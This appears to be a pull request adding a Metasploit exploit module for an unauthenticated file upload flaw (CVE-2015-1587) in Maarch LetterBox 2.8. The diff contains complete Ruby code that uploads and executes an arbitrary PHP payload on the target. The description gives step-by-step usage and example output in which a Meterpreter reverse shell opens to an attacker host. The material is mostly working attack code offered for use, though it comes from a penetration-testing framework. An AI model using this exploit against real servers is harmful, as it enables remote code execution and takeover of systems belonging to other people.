### PR TITLE
Add Maarch LetterBox file upload module

### DIFF
--- a/modules/exploits/unix/webapp/maarch_letterbox_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/maarch_letterbox_unrestricted_file_upload.rb
@@ -1,0 +1,95 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'uri'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Maarch LetterBox 2.8 Unrestricted File Upload',
+      'Description'     => %q{Maarch LetterBox 2.8 contains a flaw that allows
+                              unauthenticated users to upload files of any type due to a
+                              lack of session and file validation in the file_to_index.php
+                              script and subsequently execute PHP scripts in the context of
+                              the web server.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Rob Carr <rob[at]rastating.com>'
+        ],
+      'DisclosureDate'  => 'Feb 11 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['Maarch LetterBox', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/'])
+      ], self.class)
+  end
+
+  def letterbox_login_url
+    normalize_uri(target_uri.path, 'login.php')
+  end
+
+  def letterbox_upload_url
+    normalize_uri(target_uri.path, 'file_to_index.php')
+  end
+
+  def check
+    res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url)
+    if res.nil? || res.code != 200
+      return Msf::Exploit::CheckCode::Unknown
+    else
+      if res.body.include? 'alt="Maarch Maerys Archive v2.1 logo"'
+        return Msf::Exploit::CheckCode::Appears
+      else
+        return Msf::Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+  def generate_mime_message(payload, name)
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Preparing payload...")
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    data = generate_mime_message(payload, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => letterbox_upload_url,
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => data.to_s
+    )
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
+
+    print_status("#{peer} - Parsing server response...")
+    captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures
+    fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil?
+    payload_url = normalize_uri(target_uri.path, captures[0])
+    print_good("#{peer} - Parsed response")
+
+    print_status("#{peer} - Executing the payload at #{payload_url}")
+    register_files_for_cleanup(File.basename(URI.parse(payload_url).path))
+    send_request_cgi({ 'uri' => payload_url, 'method'  => 'GET' }, 5)
+    print_good("#{peer} - Executed payload")
+  end
+end

--- a/modules/exploits/unix/webapp/maarch_letterbox_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/maarch_letterbox_unrestricted_file_upload.rb
@@ -26,6 +26,10 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           'Rob Carr <rob[at]rastating.com>'
         ],
+      'References'      =>
+        [
+          ['CVE', '2015-1587']
+        ],
       'DisclosureDate'  => 'Feb 11 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,


### PR DESCRIPTION
This module provides the ability for an unauthenticated user to upload and execute an arbitrary PHP file by utilising a lack of validation in websites using version 2.8 of Maarch LetterBox.
## References
- http://www.cvedetails.com/cve/2015-1587/ (database doesn't seem to be updated yet with the information but this is the correct CVE-ID)
- Currently awaiting an OSVDB identifier, I will update this pull request or send a new one at a later date with the appropriate ID included once made available.
## Verification
- [x] Download and install the latest version of [Maarch LetterBox](http://sourceforge.net/projects/maarchletterbox/files/latest/download). An installation guide can be found [Here](http://wiki.maarch.org/Maarch_LetterBox/Installation_and_Administration_Guide), however the exploit should work without a full install too
- [x] Load msfconsole and `use exploit/unix/webapp/maarch_letterbox_unrestricted_file_upload`
- [x] Set RHOST to the target's address
- [x] If running LetterBox in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called maarch, set TARGETURI to /maarch/)
- [x] Set the payload
- [x] Run `check` to check if the version seems vulnerable
- [x] Run `exploit` to upload and execute the payload
## Example Output

```
msf > use exploit/unix/webapp/maarch_letterbox_unrestricted_file_upload
msf exploit(maarch_letterbox_unrestricted_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(maarch_letterbox_unrestricted_file_upload) > set TARGETURI /maarch/
TARGETURI => /maarch/
msf exploit(maarch_letterbox_unrestricted_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(maarch_letterbox_unrestricted_file_upload) > set LHOST 192.168.1.189
LHOST => 192.168.1.189
msf exploit(maarch_letterbox_unrestricted_file_upload) > check
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf exploit(maarch_letterbox_unrestricted_file_upload) > exploit

[*] Started reverse handler on 192.168.1.189:4444
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload...
[*] 192.168.1.15:80 - Parsing server response...
[+] 192.168.1.15:80 - Parsed response
[*] 192.168.1.15:80 - Executing the payload at /maarch/tmp/tmp_filed3d9fc605c0ca746ad257ce11331a6b2.php
[*] Sending stage (40499 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.189:4444 -> 192.168.1.15:39714) at 2015-02-11 19:40:34 +0000
[+] Deleted tmp_filed3d9fc605c0ca746ad257ce11331a6b2.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
```
